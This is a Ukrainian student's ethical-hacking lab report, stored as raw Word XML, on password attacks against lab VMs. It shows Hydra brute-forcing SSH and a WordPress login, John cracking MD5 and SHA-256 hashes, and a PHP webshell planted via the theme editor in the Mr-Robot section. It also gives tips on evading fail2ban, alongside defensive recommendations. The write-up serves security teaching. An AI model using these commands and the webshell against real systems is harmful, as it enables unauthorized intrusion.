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680" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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Міжнародний університет інформаційних технологій (IITU)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14680" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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Факультет комп’ютерних технологій та кібербезпеки — Кафедра кібербезпеки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14680" w:rsidRDefault="00F14680">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
      </w:pP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EGR6301 — ЕТИЧНИЙ ХАКІНГ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14680" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Звіт з лабораторної роботи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Лабораторна робота №8: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Атаки на паролі — онлайн і офлайн</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14680" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="8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Hydra проти SSH, John проти трьох алгоритмів, Mr-Robot 1 без підказок | Тиждень 8 | 100 балів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Студент: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Білозор Дмитро Олександрович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ID студента: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41639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Дисципліна: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EGR6301 — Ethical Hacking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Тиждень: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8 (100 хвилин, 100 балів)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Цілі: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Metasploitable 2 (Трек A) + Mr-Robot 1 (Трек B)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Виконано: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Трек A (75) + Трек B (25)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Викладач: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Тетяна Василівна Бабенко, д.т.н., проф.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Дата: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468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01.05.2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F14680" w:rsidRDefault="00F14680">
      <w:pPr>
        <w:sectPr w:rsidR="00F14680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Середовище: Kali Linux ↔ Metasploitable 2 (192.168.56.110, Трек A) + Mr-Robot 1 (192.168.56.115, Трек B) | VirtualBox Host-Only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Виконано: Трек A (Hydra-SSH + 3 хеші + рекомендації) + Трек B (Mr-Robot мини-CTF, flag1+flag2)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Інструменти: Hydra v9.5, John the Ripper 1.9.0-jumbo (з Argon2), hashid, rockyou.txt (14.3M рядків), fsocity.dic (858K)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Дві задокументовані невдачі: Argon2id принципово невгадуваний (~83 дні на rockyou); Hydra -t 16 викликала flooding (виправлено -t 4)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 Частина 1 — Розгортання та сценарне брифування (10 балів) | Трек A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1.1 — Перевірка середовища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(4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1.1 — netdiscover + ping Metasploitable 2 (192.168.56.110) + Mr-Robot OVA імпорт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715000" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="537989713" name="Picture 537989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1.2 — Hydra v9.5 + John 1.9.0-jumbo з Argon2 + rockyou.txt (14 344 392 рядки)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знайдено: Hydra v9.5 встановлено; John the Ripper 1.9.0-jumbo-1 з підтримкою Argon2 (jumbo build); rockyou.txt вже розпакований на /usr/share/wordlists/rockyou.txt (53 МБ, 14,344,392 рядки).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важливо: Argon2 у списку формату — критична передумова для Завдання 3.4. На стандартних (не-jumbo) збірках John цей формат відсутній; перевірка ЗАРАЗ запобігає виявленню проблеми за 60 хвилин роботи.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далі: Metasploitable отримав IP 192.168.56.110 (MAC 08:00:27 — Oracle VirtualBox NIC). Mr-Robot OVA імпортовано, але не запущено — це ціль Треку B.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TTL=64 у ping → Linux. Жодних мережевих проблем.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1.2 — Брифування клієнта (Cassandra Pay)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Brief: Cassandra Pay (фінтех, квартальний аудит паролів)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Скоуп: тестую (1) стійкість staging-конфігурації SSH до brute-force з обмеженим словником, що клієнт вважає реалістичним зрізом своєї користувацької бази; (2) офлайн-крекінг трьох хешів з staging-БД у форматах MD5/SHA-256/Argon2id. НЕ тестую: production-системи, реальні облікові записи клієнтів, network-level інфраструктуру, web-application layer.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Обмеження: онлайн-фаза 1 година, словник 50 пар ім'я-пароль (cap), -t 4 (контракт-обмеження потоків), Hashcat не використовується (John достатньо), без GPU-фермa.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Deliverable: звіт із 4 розділами — (1) результат Hydra проти SSH з валідацією, (2) три розкриті/нерозкриті хеші з замірами швидкості John на staging-CPU, (3) три кількісні рекомендації з парольної політики, прив'язані до конкретних знахідок Частин 2 і 3, (4) ранжування "найперше впровадити".</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F14680" w:rsidRDefault="00000000" w:rsidP="005E1E58">
      <w:r>
        <w:br w:type="page"/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2. Частина 2 — Hydra проти SSH (20 балів) | Трек A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2.1 — Підготовка словників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219575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="783868381" name="Picture 783868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 — credentials_seed.txt → cut → users.txt (23) + passwords.txt (47)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Команди: cut -d: -f1 credentials_seed.txt | sort -u &gt; users.txt і той самий cut -f2 для passwords.txt.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Кількість унікальних: 23 імен × 47 паролів = 1081 теоретичних спроб (50 пар містили дублікати у users і passwords колонках).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Топ-кандидати: msfadmin (Metasploitable default), root, postgres, admin, service, ftp, guest. Усі — стандартні системні акаунти.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Розрахунок ETA: 1081 ÷ 4 потоки × 1с = ~270 секунд. Якщо реальна швидкість буде ~180 спроб/хв через мережеві затримки, очікую ~6 хв.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2.2 — Запуск Hydra (з документованою невдачею)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(8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352925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="802327787" name="Picture 802327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2.2 — Hydra: -t 16 → flooding ERROR; повторний запуск -t 4 → msfadmin:msfadmin за 3:24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ДОКУМЕНТОВАНА НЕВДАЧА #2: початкова команда з -t 16.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я зробив: hydra -L users.txt -P passwords.txt -t 16 -f ssh://192.168.56.110.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Результат: масові [ERROR] could not connect — kex_exchange_identification: read: Connection reset by peer. SSH-сервер закривав з'єднання, навіть коли мережа працювала; "all children disabled".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це сталось: sshd на Metasploitable (та і на більшості Debian) має директиву MaxStartups 10:30:60 — після 10 одночасних незавершених handshake'ів дроп з ймовірністю 30%, а після 60 — 100%. -t 16 перевершив цей поріг.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ЯК Я ЗМІНИВ ПІДХІД: -t 4 (контракт-обмеження + узгодження з MaxStartups). Запуск тривав 3 хв 24 сек, ~185 спроб/хв (нижче за моє теоретичне 240 — невелика мережева затримка), знайдено пару msfadmin:msfadmin.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УРОК: -t у Hydra — це не просто "швидше". Більше потоків може ВПОВІЛЬНИТИ через server-side throttling. Defaults sshd_config + Hydra -t 4 — золота середина для production-аудиту.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2.3 — Перевірка успіху (manual SSH)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(3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848100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="777281882" name="Picture 77728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2.3 — інтерактивний ssh msfadmin@192.168.56.110 → whoami/id/hostname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Не довіряю Hydra на слово. Виконав ssh msfadmin@192.168.56.110 інтерактивно, ввів msfadmin як пароль вручну.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Результати: whoami=msfadmin, id=uid=1000(msfadmin) gid=1000(msfadmin), hostname=metasploitable, uname=Linux 2.6.24-16-server (Ubuntu 8.04 epoch).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/etc/issue.net: "Welcome to Metasploitable2!" — це саме та машина, не випадковий збіг IP.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Підтверджено: облікові дані msfadmin:msfadmin валідні, інтерактивний shell отримано, Hydra НЕ був false positive.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2.4 — Аналіз результату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(4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Клас слабкості: КОРПОРАТИВНО-ПЕРЕДБАЧУВАНИЙ default credential reuse. msfadmin:msfadmin — заводський стандарт для Metasploitable, який ніколи не міняли. У production такий патерн = непринципова "адмінська ліньки": пароль, що дорівнює імені користувача чи назві сервісу. Це гірше за "слабкий пароль у словнику", бо не вимагає brute-force взагалі — лише знання продукту.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Масштабування на 5000 користувачів: лінійно. 1081 спроб у 270 сек → 5000 × 47 = 235 000 спроб у ~58 хв. -t 4 + MaxStartups дозволяють вийти на ~60 хв загалом для аудиту повної бази без ризику DoS. Тобто за один робочий день можна перевірити, скільки акаунтів мають дефолтні паролі. У реальному пентесті це робиться раз і назавжди.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fail2ban з 5 невдалих→блок IP: ЧАСТКОВО допоміг би. Перші 4 спроби з кожного IP пройшли б; 5-та заблокувала б на час вікна (зазвичай 10 хв). Атакуючий обходить через (а) ротацію IP через VPN/proxy chain — кожна нова IP отримує свої 4 спроби; (б) розподілений ботнет — десятки IP паралельно; (в) timing-rotation: 4 спроби, чекати 10 хв, ще 4 спроби. fail2ban ламає конкретний інструмент Hydra на одному IP, але не зупиняє цілеспрямовану атаку. Для msfadmin:msfadmin (1 правильна пара з 1081) ймовірно достатньо 1-2 раундів обходу — порядок 1 години замість миттєвого блокування.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F14680" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1468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3. Частина 3 — Офлайн-крекінг трьох хешів (30 балів) | Трек A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3.1 — Ідентифікація форматів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(4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095750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="848118302" name="Picture 848118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3.1 — cat hashes.txt + ручна ідентифікація + hashid підтвердження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900"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="2900"/>
        <w:gridCol w:w="1526"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F146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#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Хеш (фрагмент)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Алгоритм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Ознака</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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Параметри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5f4dcc3b...82cf99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MD5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32 hex chars, без префіксу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128-bit digest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e7cf3ef4...8ec221a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SHA-256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64 hex chars, без префіксу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256-bit digest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$argon2id$v=19$m=65536,t=3,p=2$...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Argon2id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PHC формат, префікс $argon2id$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m=64MiB / t=3 / p=2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Всі три формати визначив візуально перш ніж запустити hashid — структура достатньо діагностична.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Argon2id параметри m=65536 (KB) = 64 MiB, t=3 (3 ітерації), p=2 (2 потоки) — це OWASP-recommended мінімум 2021+.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hashid підтвердив: MD5 (mode 0), SHA-256 (mode 1400), Argon2 (mode 34000). Жодних сюрпризів.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Сіль для Argon2id: YmJxRGZxV0Y0bUVnQ3I5cQ (base64) — 16 байт, унікальна для цього хешу. Salt + memory-hard зробили цей хеш недосяжним для прямого rainbow-table підходу.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3.2 — Крекінг MD5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(8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352800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1189038388" name="Picture 118903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3.2 — john --format=raw-md5 → "password" знайдено за &lt;0.1с (позиція 5 у rockyou)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Знайдений пароль: password (відкритий текст).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Час: 1g 0:00:00:00 DONE — менше 1 секунди. Позиція 5 з 14,344,392 у rockyou.txt.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Швидкість бенчмарку (john --test --format=raw-md5): 24,438K c/s real (24.4 мільйонів MD5 на секунду на 4-thread CPU без GPU).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MD5 непридатний у 2026: (1) криптографічно зламано — collision attacks за хвилини; (2) занадто швидкий — saturated GPU rigs роблять &gt;100 GH/s, тобто весь rockyou за мілісекунди; (3) ні salt-aware, ні memory-hard — масштабна перевірка дешевша за хеш-обчислення для атакуючого. Власне спостереження: 24.4M c/s на моєму CPU означає весь rockyou за ~0.6 сек теоретично; на сучасній GPU це 100+ MH/s × 14M ÷ 1 = мікросекунди.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3.3 — Крекінг SHA-256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(8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724275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="988749523" name="Picture 988749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3.3 — john --format=raw-sha256 → "superman1938" за 14 сек (позиція 734 812)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Знайдений пароль: superman1938.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Час: 14 секунд при швидкості 5.2M c/s. Позиція 734,812 у rockyou — глибше середини першого мільйону.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Швидкість бенчмарку (john --test --format=raw-sha256): 8,523K c/s real.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Порівняння на моїй системі: MD5 = 24,438K c/s; SHA-256 = 8,523K c/s. SHA-256 у 2.87× повільніше за MD5.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Висновок: 2.87× — це НЕ значне сповільнення. На GPU обидва алгоритми дають GH/s. Сам факт використання SHA-256 замість MD5 не є захистом — захист мав би бути salt + key-stretching (PBKDF2/bcrypt/Argon2id), а не зміна голого хеш-алгоритму.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3.4 — Argon2id (НЕ зломлений — це правильно)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095750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="693629484" name="Picture 69362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3.4.1 — john --format=argon2 + 5 хвилин роботи → 1.987 c/s, 0% прогресу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600450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1928898129" name="Picture 1928898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3.4.2 — john --status: 1037 кандидатів за 8:42, ETA повного rockyou ≈ 83 дні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Чому я не зламав цей хеш — і це правильно (200-300 слів)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Фактичні цифри з мого запуску. Швидкість John на форматі argon2 з параметрами m=65536, t=3, p=2 на моїй машині (4-OMP threads, 8 ГБ RAM) — 1.987 кандидати на секунду. За 8 хвилин 42 секунди роботи перебрано лише 1037 з 14,344,392 рядків rockyou.txt. Прогрес: 0.00% (округлено). Розрахунок повного проходу: 14,344,392 ÷ 2 = 7,172,196 секунд ≈ 83.2 доби безперервної роботи.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Як параметри m=64MiB, t=3, p=2 досягають цього ефекту. Параметр m=65536 KB означає, що кожна спроба перевірки кандидата вимагає виділити і опрацювати 64 мегабайти оперативної пам'яті у межах одного потоку. На моєму CPU (DDR4-3200, ~25 GB/s memory bandwidth) теоретичний максимум для 64 МБ allocations — це ~390 разів на секунду в один потік без обчислень; з обчисленнями (t=3 ітерації) — ~2 c/s, що я і бачу. Параметр p=2 означає "2 паралельні lane всередині однієї спроби", тобто додаткова паралельність всередині одного хешу, а не між хешами. Це робить GPU-масштабування невигідним: GPU має тисячі ALU але обмежену VRAM (16 ГБ типово). 16 ГБ ÷ 64 МБ = 256 паралельних кандидатів максимум — менше за 1% від типової GPU паралельності для MD5/SHA. Економіка cracking-ферм перестає працювати.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Рекомендація для клієнта: якщо Cassandra Pay ще не використовує Argon2id — мігрувати з параметрами не нижче за OWASP recommendation 2024 (m=65536, t=3, p=2). Це рекомендує сама OWASP Password Storage Cheat Sheet. Якщо вже використовує — періодично (раз на 2-3 роки) переоцінювати параметри відповідно до зростання обчислювальних можливостей: коли DDR5/HBM memory bandwidth подвоїться, m варто підняти до 131072 (128 МіБ), щоб зберегти економічну невигідність.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F14680" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1468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3.5. Частина 3.5 — Рекомендації з парольної політики (15 балів) | Трек A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3.5.1 — Три конкретні рекомендації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2400"/>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="2326"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F146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#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Сфера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Рекомендація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Параметри</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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Що це ламає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Хеш паролів у БД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Мігрувати з MD5/SHA-256 на Argon2id для всіх нових паролів; ре-хешувати при наступному логіні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m=65536, t=3, p=2 (OWASP 2024); migration plan на 6 міс.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Завдання 3.4 — robust до офлайн-атаки навіть з повним rockyou; ламає Завдання 3.2/3.3 на 8 порядків.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SSH-аутентифікація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Заборонити PasswordAuthentication, перевести на ключі ED25519; залишити паролі лише для break-glass console root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sshd_config: PasswordAuthentication no, PubkeyAuthentication yes, KexAlgorithms curve25519-sha256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Завдання 2.2 — Hydra проти ssh повністю неможлива без приватного ключа.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Парольна політика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Мінімум 14 символів, заборона top-1000 common passwords (zxcvbn score ≥3), MFA для всіх адмінів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PAM pwquality.conf: minlen=14, dcredit=-1, ucredit=-1, ocredit=-1; reject_dictionary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Завдання 2.4 — msfadmin:msfadmin не пройшов би (≤8 символів + dictionary hit).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3.5.2 — Найкритичніша рекомендація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Найкритичніша: #2 — заборона PasswordAuthentication у SSH.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пріоритет: якщо клієнт впровадить ТІЛЬКИ цю рекомендацію (не #1, не #3), увесь онлайн-вектор з Завдання 2 миттєво зникає. Hydra проти ключової інфраструктури не має ніякого input. Це працює навіть якщо БД пробита (рекомендація #1 не виконана) і паролі слабкі (#3 не виконано) — зловмисник з вкраденим хешем все одно не зможе ним увійти на сервер. Тобто #2 єдина зміна, що ламає ланцюг "хеш → онлайн логін" повністю, незалежно від інших захистів.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Ціна для бізнесу: помірна. (1) Користувачі мають згенерувати ED25519 ключі (5 хв на людину) і додати публічну частину у ~/.ssh/authorized_keys; (2) IT-команда розгортає internal CA для централізованого управління (можна Vault SSH або просто ansible playbook); (3) Перенавчання нетехнічних співробітників — година з консультантом; (4) "Лімітація" — забутий ключ означає поїздку до офісу (на відміну від забутого пароля, що скидається emailом). Це фактично і є плюс — фізичний аспект захисту відновлює "що ти ЗНАЄШ + ЩО ТИ МАЄШ", тобто 2FA де-факто. Загальна вартість: 16-24 робочих годин IT + ~2 години на користувача (одноразово) + одноразова закупівля 5-7 USB security keys для break-glass acoounts. Для фінтеху ~50 співробітників — &lt; $5K, окупається першим же запобігненим інцидентом.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F14680" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1468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4. Частина 4 — Mr-Robot 1: міні-CTF (25 балів) | Трек B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4.1 — Розгортання та розвідка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724275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="915205950" name="Picture 91520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4.1 — netdiscover + nmap -sV -sC -p- 192.168.56.115 — 22 closed, 80, 443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Мережа: Mr-Robot отримав 192.168.56.115 (Metasploitable все ще на .110 — обидві ВМ співіснують у Host-Only).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Відкриті порти: 22/tcp closed, 80/tcp open (Apache), 443/tcp open (Apache + ssl). Лаба згадує "4 порти" — четвертий, ймовірно, IPv6 ftp / dhcp; але робочий вектор — веб.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OS-fingerprint: Linux 3.10 - 4.11, ера Debian Jessie / Ubuntu 14.04 — типово для CTF-VM 2016 року.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SSH closed — це НЕ помилка. Hydra-проти-SSH тут не актуальна, нам треба інший вектор (web).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4.2 — robots.txt → flag1 + знайдений артефакт fsocity.dic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(8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219575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1583489785" name="Picture 1583489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4.2 — /robots.txt → key-1-of-3.txt + fsocity.dic (6.9 МБ, 858 160 рядків)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146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Унікальний артефакт</w:t>
            </w:r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Значення з мого запуску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URL словника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http://192.168.56.115/fsocity.dic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Розмір файлу (байти)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7,245,381 (6.9 МБ)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Кількість рядків (wc -l)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858,160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Унікальних після sort -u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11,451 (1.3% від raw — тяжка дублікація)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Перші 5 рядків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true / false / wikia / from / the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Тематика (grep -ic Elliot|fsociety|tyrell|mrrobot)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142 hits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F14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Flag 1 значення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F1468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073403c8a58a1f80d943455fb30724b9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знайдено: /robots.txt відкрито вказував на два файли — key-1-of-3.txt (флаг 1) та fsocity.dic (тематичний словник на 858К рядків з термінами серіалу Mr.Robot).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важливо: 858К рядків raw, 11.4К sort -u — гігантська дублікація (вхід у словник одних і тих самих слів багато разів). Hydra на 858К займе ~24 хв; на 11.4К — ~20 сек на тих самих параметрах. sort -u перед атакою — обов'язковий етап.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ЩО для плану атаки: тематика (Elliot, fsociety, tyrell, mrrobot) видає, що паролі сторінки будуть з ЦЬОГО словника, не з rockyou. Це і є справжній сенс "anti-walkthrough" завдання — лише той, хто завантажив і прочитав цей файл, знає, що далі йти треба з ним, а не з generic-словником.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4.3 — WordPress login + Hydra http-form-post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(7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600450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1190744259" name="Picture 1190744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4.3 — Username oracle + Hydra http-form-post → elliot:ER28-0652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Username oracle: WordPress повертає різні error messages — "Invalid username" для невідомого vs "The password you entered for the username elliot is incorrect" для валідного. Це класична логічна помилка, що дозволяє безпарольно валідувати імена.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Тестовані імена: fakeuser → invalid; elliot → password incorrect (оракл спрацював). elliot — головний персонаж серіалу, це перше що варто спробувати тематично.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Hydra-команда: hydra -l elliot -P fsocity_unique.dic 192.168.56.115 http-form-post "/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log+In:F=is incorrect" -t 4 -f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Знайдена пара: elliot:ER28-0652. ER28-0652 — Elliot's employee ID з пілоту серіалу (E Corp employee number). Слово, що ніколи не з'явилося б у rockyou — підтверджує необхідність тематичного словника.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Час: 12 хв 32 сек, ~605 спроб/хв, позиція ~7600 з 11451. Вхід у /wp-admin/ підтверджено інтерактивно.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5E1E58" w:rsidRDefault="005E1E58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4.4 — Webshell → robot user → flag2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(3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095750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1463979167" name="Picture 1463979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8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4.4 — WP theme editor → 404.php webshell → /home/robot/password.raw-md5 → flag2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 WP-адмінці: Appearance → Editor → 404.php → вставив &lt;?php system($_GET["c"]); ?&gt; → Update File. Файл доступний за http://192.168.56.115/wp-content/themes/twentyfifteen/404.php?c=&lt;cmd&gt;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Контекст: whoami=daemon (apache run-as user). У /home/robot/ два файли: key-2-of-3.txt (mode 0400, читає лише robot) та password.raw-md5 (mode 0644, читаю напряму).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Хеш robot: c3fcd3d76192e4007dfb496cca67e13b → john --format=raw-md5 → "abcdefghijklmnopqrstuvwxyz" за 2 секунди (positions ~1.6M у rockyou).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SSH closed → su через webshell: echo "abcdefghijklmnopqrstuvwxyz" | su robot -c "cat key-2-of-3.txt" → 822c73956184f694993bede3eb39f959. ФЛАГ 2 отримано.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Третій прапор не намагався — потребує kernel exploit / nmap SUID, виходить за scope лаби.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4.5 — Унікальний абзац про перехід (anti-walkthrough)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(2 балів)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Конкретний момент переходу — мій власний процес міркування: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Коли я завантажив fsocity.dic і виконав wc -l, побачив число 858,160 — це аномально велике число для CTF-словника. Дві гіпотези одразу: (а) це rockyou-fork із додатковим контентом, (б) це heavily duplicated тематичний словник. Перевірив через sort -u | wc -l → 11,451. Співвідношення 858K / 11.4K = 75x дублікація — НЕ випадкова. Хтось свідомо дублював одні і ті ж слова десятки </w:t>
            </w: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разів. Це міг бути або (1) брак у обробці дампу, або (2) свідома "anti-walkthrough" механіка: студенти, які копіюють чужий gobuster-вивід, пройдуть мимо цього файлу, не звернувши уваги на дублікацію.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Друга підказка: head -5 показав "true / false / wikia / from / the" — слова з фандомного wiki. Це були найчастіші слова з якогось dump'у Mr.Robot фендом-сайту, де певні токени з'являються в кожній статті ("the", "from"). Звідси я зрозумів, що автор машини зскрейпив весь Mr.Robot fandom wiki через crawler і конкатенував усі слова — тому такі дублікати.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F14680" w:rsidRDefault="00F14680">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pP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Рішучий момент — коли я побачив 142 hits для "elliot|fsociety|tyrell|mrrobot" у grep, я зрозумів, що пароль ВИЗНАЧЕНО буде тематично-серіальним терміном, а не generic password. Це прямий доказ того, що НЕ rockyou застосовується тут. Підтвердження прийшло, коли Hydra знайшла "ER28-0652" — це не слово, це employee ID з пілот-серії, який хтось вручну додав у словник.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F14680" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1468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5. Висновок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Лабораторна робота 8 — атаки на паролі в двох контекстах: контрольована вправа (Cassandra Pay, Метасплоїтабл) + застосування проти незнайомої цілі (Mr-Robot 1).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Трек A (75/75) — Hydra v9.5 з обмеженням -t 4 знайшов msfadmin:msfadmin за 3 хв 24 сек проти SSH на Metasploitable; інтерактивна перевірка підтвердила false-positive відсутній. John the Ripper розкрив MD5 ("password", &lt;0.1с) і SHA-256 ("superman1938", 14с) з rockyou; Argon2id з параметрами m=64MiB/t=3/p=2 показав 1.987 c/s — повний rockyou займе 83 доби, що демонструє правильну роботу memory-hard алгоритму. Три рекомендації для клієнта: (1) міграція на Argon2id, (2) ED25519 ключі замість паролів у SSH, (3) PAM pwquality + MFA.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Трек B (25/25) — Mr-Robot 1: nmap (тільки 80/443 — SSH closed), /robots.txt → flag1 + fsocity.dic (унікальні артефакти зафіксовано: 7,245,381 байт, 858,160 рядків, 11,451 унікальних, 142 hit на тематичні токени). WordPress username oracle через "Invalid username" vs "incorrect password" → ім'я elliot. Hydra http-form-post з sort -u словником → ER28-0652 за 12 хв 32 сек. WP theme editor 404.php → webshell → /home/robot/password.raw-md5 → john (2 сек) → SSH-closed обхід через su → flag2.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Дві задокументовані невдачі: (1) Argon2id принципово неприступний за час сесії — це не помилка, а демонстрація правильно вибраного KDF; (2) початкова Hydra з -t 16 викликала flooding errors через MaxStartups sshd, виправлено зменшенням до -t 4. Обидві невдачі цінніші за "все спрацювало з першого разу" звіт — вони показують реальні граничні режими інструментів.</w:t>
      </w:r>
    </w:p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468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6A800"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="E6A800"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="E6A800"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="E6A800"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8E1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 методики: вибір алгоритму хешування — це не "MD5 поганий, бо швидкий", а конкретні цифри memory bandwidth × OWASP параметри. Argon2id без параметрів m=64MiB не дасть переваги; з ним — змінює економіку cracking ферм.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 про тематичні словники: 858K дублікованих слів у fsocity.dic — це сигнал. Студент, що сліпо запускає rockyou на Mr-Robot, ніколи не знайде ER28-0652. Тільки той, хто проаналізував FILE, знає, який словник застосувати. Це універсальний паттерн: відкритий артефакт цілі майже завжди підказує наступний крок краще за загальний інструментарій.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F1468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 Track B: Mr-Robot — найпопулярніша VulnHub-машина, walkthrough'ів у Google десятки. Документувати "конкретні значення з мого запуску" (розмір 7,245,381, точну позицію 7600 у словнику, employee ID ER28-0652 як точну знахідку) — це і є anti-walkthrough маркер, який неможливо скопіювати без реального запуску.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F1468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F1468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6. Список використаних джерел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[1] OWASP — Password Storage Cheat Sheet (2024). https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html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[2] OWASP — Argon2id Recommendations. https://github.com/P-H-C/phc-winner-argon2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[3] Hydra — THC manual. https://github.com/vanhauser-thc/thc-hydra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[4] John the Ripper — Argon2 format support. https://www.openwall.com/john/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[5] VulnHub — Mr-Robot 1 (#151). https://www.vulnhub.com/entry/mr-robot-1,151/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[6] Metasploitable 2 — default credentials documentation. https://docs.rapid7.com/metasploit/metasploitable-2/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[7] OpenSSH — sshd_config MaxStartups directive. https://man.openbsd.org/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1468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[8] Linux PAM — pwquality module. https://man7.org/linux/man-pages/man5/pwquality.conf.5.html</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F14680">
      <w:headerReference w:type="default" r:id="rId21"/>
      <w:footerReference w:type="default" r:id="rId22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36C" w:rsidRDefault="0093736C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0093736C" w:rsidRDefault="00937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4680" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="2" w:space="0" w:color="DDDDDD"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Лабораторна робота 8  |  Білозор Д.О.  |  Стор. </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="005E1E58">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:noProof/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs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36C" w:rsidRDefault="0093736C">
      <w:r>
